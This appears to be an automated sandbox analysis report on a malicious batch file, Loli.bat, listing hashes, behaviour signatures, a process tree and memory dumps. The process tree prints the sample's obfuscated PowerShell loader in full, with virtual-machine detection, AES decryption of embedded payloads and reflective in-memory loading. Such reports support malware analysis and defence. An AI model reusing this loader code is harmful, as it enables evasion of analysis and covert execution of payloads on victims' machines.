377e07c89866212c545edcc127f8710d90fd2acbfb5a3665c6595527b516d0e4

General

Target

Loli.bat
Size

7.4MB
MD5

e4bfe64348f8d70c36e5d7ef6f79cd3b
SHA1

9595ce4b92893dc10a894bf1c87c75308aa1f826
SHA256

377e07c89866212c545edcc127f8710d90fd2acbfb5a3665c6595527b516d0e4
SHA512

5bd04dd26bd56cc00e84303d592ac7aa2f085a21f2e9301e805f44608d79b6154aae49865a08f0fdba95fc45bff18fa8c9fc75d7c01cde401358e25aab5801fa
SSDEEP

49152:0ftkwLa4ERKZbq/giN7Uo5KRaCGyA1YKKogSj6LRobnlS0Di/zkQZHv6t0ORkVTZ:C

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2592	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2592	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2592	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 2576	2376	cmd.exe	31
PID 2376 wrote to memory of 2576	2376	cmd.exe	31
PID 2376 wrote to memory of 2576	2376	cmd.exe	31
PID 2376 wrote to memory of 2192	2376	cmd.exe	32
PID 2376 wrote to memory of 2192	2376	cmd.exe	32
PID 2376 wrote to memory of 2192	2376	cmd.exe	32
PID 2376 wrote to memory of 2172	2376	cmd.exe	33
PID 2376 wrote to memory of 2172	2376	cmd.exe	33
PID 2376 wrote to memory of 2172	2376	cmd.exe	33
PID 2376 wrote to memory of 1936	2376	cmd.exe	34
PID 2376 wrote to memory of 1936	2376	cmd.exe	34
PID 2376 wrote to memory of 1936	2376	cmd.exe	34
PID 2376 wrote to memory of 1156	2376	cmd.exe	35
PID 2376 wrote to memory of 1156	2376	cmd.exe	35
PID 2376 wrote to memory of 1156	2376	cmd.exe	35
PID 2376 wrote to memory of 2592	2376	cmd.exe	36
PID 2376 wrote to memory of 2592	2376	cmd.exe	36
PID 2376 wrote to memory of 2592	2376	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2576
- C:\Windows\system32\findstr.exe
  findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
  2⤵
  PID:2192
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2172
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:1936
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function DcdT($eCPO){ Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$wggZ=[xFSxFyxFsxFtexFmxF.xFSxFexFcuxFrxFixFtxFyxF.xFCrxFypxFtxFoxFgrxFaxFphxFyxF.xFAxFesxF]xF::xFCxFrxFexFaxFtexF(xF)xF;'.Replace('xF', ''); Invoke-Expression -WarningAction Inquire -Debug '$wggZ.MQMoQMdQMeQM=[QMSQMyQMsQMtQMemQM.QMSQMeQMcQMuQMriQMtyQM.QMCQMryQMpQMtoQMgQMrQMaQMphQMyQM.CQMiQMpQMhQMeQMrMQMoQMdQMeQM]:QM:QMCQMBQMC;'.Replace('QM', ''); Invoke-Expression -InformationAction Ignore -Verbose '$wggZ.PxAaxAdxAdxAinxAgxA=xA[xASxAysxAtxAexAmxA.xASxAecxAurxAixAtxAy.xACxAryxApxAtxAoxAgrxAaxAphxAyxA.xAPxAaxAddxAixAnxAgxAMoxAdxAexA]xA::xAPKxACSxA7;'.Replace('xA', ''); Invoke-Expression -WarningAction Inquire '$wggZ.KTweTwyTw=Tw[STwyTwsTwtTweTwm.TwCTwoTwnTwvTweTwrtTw]:Tw:TwFTwroTwmTwBaTwsTweTw6Tw4STwtTwriTwnTwg("DTwHTwxTwITw4ATwKTwCTwxTwfTwUyTw2TwDTwUTwTTw5TwzdTw0ATw4TwmTw7cTwwTw9rTwTTwtTw3TwVyTwWTwj7TwsTwzTwsTwWTw+/TwITw=Tw");'.Replace('Tw', ''); Invoke-Expression -Debug '$wggZ.IGNVGN=GN[GNSyGNsGNtGNeGNmGN.CGNoGNnGNvGNeGNrGNt]GN::GNFGNrGNomGNBGNasGNeGN6GN4GNStGNrGNinGNgGN("7GNrGNHGNwGNHBGNHGNCGN+GN6GNmVGN+GN2GNjGNvGN1GNRUGNoBGNQGN=GN=");'.Replace('GN', ''); $DeCA=$wggZ.CreateDecryptor(); $PePz=$DeCA.TransformFinalBlock($eCPO, 0, $eCPO.Length); $DeCA.Dispose(); $wggZ.Dispose(); $PePz;}function IBnH($eCPO){ Invoke-Expression -Verbose -Debug '$VVee=NGYeGYwGY-GYObGYjGYeGYcGYtGY SGYyGYsGYtGYeGYmGY.IGYO.GYMGYeGYmoGYrGYySGYtGYrGYeGYamGY(,$eCPO);'.Replace('GY', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire '$ZBYu=NGYeGYwGY-GYObGYjGYeGYcGYtGY SGYyGYsGYtGYeGYmGY.IGYO.GYMGYeGYmoGYrGYySGYtGYrGYeGYamGY;'.Replace('GY', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$UCXm=NJheJhwJh-JhObJhjJheJhcJhtJh SJhyJhsJhtJheJhmJh.IJhO.JhCJhoJhmpJhrJhesJhsJhiJhoJhn.JhGJhZiJhpJhSJhtJhrJheaJhmJh($VVee, [JhIJhOJh.JhCoJhmJhpJhrJheJhssJhiJhoJhnJh.JhCJhomJhprJheJhsJhsiJhoJhnMJhoJhdJheJh]:Jh:JhDeJhcJhoJhmJhpJhreJhsJhsJh);'.Replace('Jh', ''); $UCXm.CopyTo($ZBYu); $UCXm.Dispose(); $VVee.Dispose(); $ZBYu.Dispose(); $ZBYu.ToArray();}function ohAa($eCPO,$fBUZ){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$pPPX=[TeSTeyTesTeteTemTe.TeRTeeTeflTeeTecTetTeiTeoTen.TeAsTesTeeTembTelTey]Te:Te:TeLTeoaTedTe([byte[]]$eCPO);'.Replace('Te', ''); Invoke-Expression -WarningAction Inquire '$JnHF=$pPPX.EdfndftdfrdfyPdfodfidfndft;'.Replace('df', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug '$JnHF.UDIUDnUDvUDokUDeUD(UD$UDnUDulUDlUD, $fBUZ);'.Replace('UD', '');}$doho = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $doho;$AwXW=[System.IO.File]::ReadAllText($doho).Split([Environment]::NewLine);foreach ($cxlQ in $AwXW) { if ($cxlQ.StartsWith('azhCc')) { $FRUQ=$cxlQ.Substring(5); break; }}$NIKZ=[string[]]$FRUQ.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$Lws = IBnH (DcdT ([oSCoSooSnoSveoSroStoS]oS:oS:FoSroSooSmoSBoSaoSseoS64oSSoStoSrioSnoSg($NIKZ[0].Replace("#", "/").Replace("@", "A"))));'.Replace('oS', '');Invoke-Expression -InformationAction Ignore -Debug -Verbose -WarningAction Inquire '$ijc = IBnH (DcdT ([oSCoSooSnoSveoSroStoS]oS:oS:FoSroSooSmoSBoSaoSseoS64oSSoStoSrioSnoSg($NIKZ[1].Replace("#", "/").Replace("@", "A"))));'.Replace('oS', '');Invoke-Expression -Debug '$oYy = IBnH (DcdT ([oSCoSooSnoSveoSroStoS]oS:oS:FoSroSooSmoSBoSaoSseoS64oSSoStoSrioSnoSg($NIKZ[2].Replace("#", "/").Replace("@", "A"))));'.Replace('oS', '');ohAa $Lws $null;ohAa $ijc $null;ohAa $oYy (,[string[]] (''));
  2⤵
  PID:1156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2592-4-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

Filesize
4KB

Download
memory/2592-5-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2592-6-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2592-7-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2592-8-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2592-9-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2592-10-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2592-11-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

Filesize
9.6MB

Download
memory/2592-12-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing